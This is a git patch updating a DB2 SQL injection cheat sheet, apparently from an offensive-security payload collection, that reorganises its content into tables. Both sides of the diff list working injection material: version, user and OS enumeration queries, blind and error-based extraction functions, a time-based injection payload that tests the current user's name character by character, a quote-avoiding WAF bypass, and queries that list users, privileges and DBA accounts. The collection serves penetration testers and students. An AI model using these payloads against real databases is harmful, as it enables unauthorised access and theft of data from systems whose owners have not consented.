From b98f8ca5871b2f439f6186df21d5a623921eedbe Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 17 Nov 2024 18:37:07 +0100 Subject: [PATCH] DB2 Injection updates --- SQL Injection/DB2 Injection.md | 266 ++++++++++++--------------------- 1 file changed, 95 insertions(+), 171 deletions(-) diff --git a/SQL Injection/DB2 Injection.md b/SQL Injection/DB2 Injection.md index 75e9484..abcf578 100644 --- a/SQL Injection/DB2 Injection.md +++ b/SQL Injection/DB2 Injection.md @@ -5,203 +5,127 @@ ## Summary -* [DB2 Cheatsheet](#db2-cheatsheet) +* [DB2 Comments](#db2-comments) +* [DB2 Default Databases](#db2-default-databases) +* [DB2 Enumeration](#db2-enumeration) +* [DB2 Methodology](#db2-methodology) +* [DB2 Error Based](#db2-error-based) +* [DB2 Blind Based](#db2-blind-based) +* [DB2 Time Based](#db2-time-based) +* [DB2 WAF Bypass](#db2-waf-bypass) +* [DB2 Accounts and Privileges](#db2-accounts-and-privileges) * [References](#references) -## DB2 Cheatsheet +## DB2 Comments -### Version +| Type | Description | +| -------------------------- | --------------------------------- | +| `--` | SQL comment | + + +## DB2 Default Databases + +| Name | Description | +| ----------- | --------------------------------------------------------------------- | +| SYSIBM | Core system catalog tables storing metadata for database objects. | +| SYSCAT | User-friendly views for accessing metadata in the SYSIBM tables. | +| SYSSTAT | Statistics tables used by the DB2 optimizer for query optimization. | +| SYSPUBLIC | Metadata about objects available to all users (granted to PUBLIC). | +| SYSIBMADM | Administrative views for monitoring and managing the database system. | +| SYSTOOLs | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. | + + +## DB2 Enumeration + +| Description | SQL Query | +| ---------------- | ----------------------------------------- | +| DBMS version | `select versionnumber, version_timestamp from sysibm.sysversions;` | +| DBMS version | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` | +| DBMS version | `select getvariable('sysibm.version') from sysibm.sysdummy1` | +| DBMS version | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` | +| DBMS version | `select service_level,bld_level from sysibmadm.env_inst_info` | +| Current user | `select user from sysibm.sysdummy1` | +| Current user | `select session_user from sysibm.sysdummy1` | +| Current user | `select system_user from sysibm.sysdummy1` | +| Current database | `select current server from sysibm.sysdummy1` | +| OS info | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` | + + +## DB2 Methodology + + +| Description | SQL Query | +| ---------------- | ------------------------------------ | +| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` | +| List databases | `SELECT schemaname FROM syscat.schemata;` | +| List columns | `SELECT name, tbname, coltype FROM sysibm.syscolumns` | +| List tables | `SELECT table_name FROM sysibm.tables` | +| List tables | `SELECT name FROM sysibm.systables` | +| List tables | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` | + + +## DB2 Error Based ```sql -select versionnumber, version_timestamp from sysibm.sysversions; -select service_level from table(sysproc.env_get_inst_info()) as instanceinfo -select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+) -select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo -select service_level,bld_level from sysibmadm.env_inst_info -``` +-- Returns all in one xml-formatted string +select xmlagg(xmlrow(table_schema)) from sysibm.tables -### Comments +-- Same but without repeated elements +select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -```sql -select blah from foo -- comment like this (double dash) -``` - -### Current User - -```sql -select user from sysibm.sysdummy1 -select session_user from sysibm.sysdummy1 -select system_user from sysibm.sysdummy1 -``` - -### List Users - -DB2 uses OS accounts - -```sql -select distinct(authid) from sysibmadm.privileges -- priv required -select grantee from syscat.dbauth -- incomplete results -select distinct(definer) from syscat.schemata -- more accurate -select distinct(grantee) from sysibm.systabauth -- same as previous -``` - -### List Privileges - -```sql -select * from syscat.tabauth -- shows priv on tables -select * from syscat.tabauth where grantee = current user -- shows privs for current user -select * from syscat.dbauth where grantee = current user;; -select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies -``` - -### List DBA Accounts - -```sql -select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y' -select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’ -``` - -### Current Database - -```sql -select current server from sysibm.sysdummy1 -``` - -### List Databases - -```sql -select distinct(table_catalog) from sysibm.tables -SELECT schemaname FROM syscat.schemata; -``` - -### List Columns - -```sql -select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat -``` - -### List Tables - -```sql -select table_name from sysibm.tables -select name from sysibm.systables -``` - -### Find Tables From Column Name - -```sql -select tbname from sysibm.syscolumns where name='username' -``` - -### Select Nth Row - -```sql -select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only -``` - -### Select Nth Char - -```sql -select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b -``` - -### Bitwise AND/OR/NOT/XOR - -```sql -select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot -``` - -### ASCII Value - -```sql -Char select chr(65) from sysibm.sysdummy1 -- returns 'A' -``` - -### Char -> ASCII Value - -```sql -select ascii('A') from sysibm.sysdummy1 -- returns 65 -``` - -### Casting - -```sql -select cast('123' as integer) from sysibm.sysdummy1 -select cast(1 as char) from sysibm.sysdummy1 -``` - -### String Concat - -```sql -select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc' -select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab' +-- Returns all in one xml-formatted string. +-- May need CAST(xml2clob(… AS varchar(500)) to display the result. +select xml2clob(xmelement(name t, table_schema)) from sysibm.tables ``` -### IF Statement -Seems only allowed in stored procedures. Use case logic instead. +## DB2 Blind Based -### Case Statement - -```sql -select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1 -``` +| Description | SQL Query | +| ---------------- | ------------------------------------------ | +| Substring | `select substr('abc',2,1) FROM sysibm.sysdummy1` | +| ASCII value | `select chr(65) from sysibm.sysdummy1` | +| CHAR to ASCII | `select ascii('A') from sysibm.sysdummy1` | +| Select Nth Row | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` | +| Bitwise AND | `select bitand(1,0) from sysibm.sysdummy1` | +| Bitwise AND NOT | `select bitandnot(1,0) from sysibm.sysdummy1` | +| Bitwise OR | `select bitor(1,0) from sysibm.sysdummy1` | +| Bitwise XOR | `select bitxor(1,0) from sysibm.sysdummy1` | +| Bitwise NOT | `select bitnot(1,0) from sysibm.sysdummy1` | -### Avoiding Quotes +## DB2 Time Based -```sql -SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too -``` +Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response. -### Time Delay - -Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response. -However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster. ```sql ' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 ``` -### Serialize to XML (for error based) + +## DB2 WAF Bypass + +### Avoiding Quotes ```sql -select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string -select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements -select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result. +SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 ``` -### Command Execution and Local File Access -Seems it's only allowed from procedures or UDFs. +## DB2 Accounts and Privileges -### Hostname/IP and OS INFO - -```sql -select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv -``` - -### Location of DB Files - -```sql -select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv -``` - -### System Config - -```sql -select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions. -select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions. -``` - -### Default System Database - -* SYSIBM -* SYSCAT -* SYSSTAT -* SYSPUBLIC -* SYSIBMADM -* SYSTOOLs +| Description | SQL Query | +| ---------------- | ------------------------------------ | +| List users | `select distinct(grantee) from sysibm.systabauth` | +| List users | `select distinct(definer) from syscat.schemata` | +| List users | `select distinct(authid) from sysibmadm.privileges` | +| List users | `select grantee from syscat.dbauth` | +| List privileges | `select * from syscat.tabauth` | +| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` | +| List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` | +| List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` | +| Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` | ## References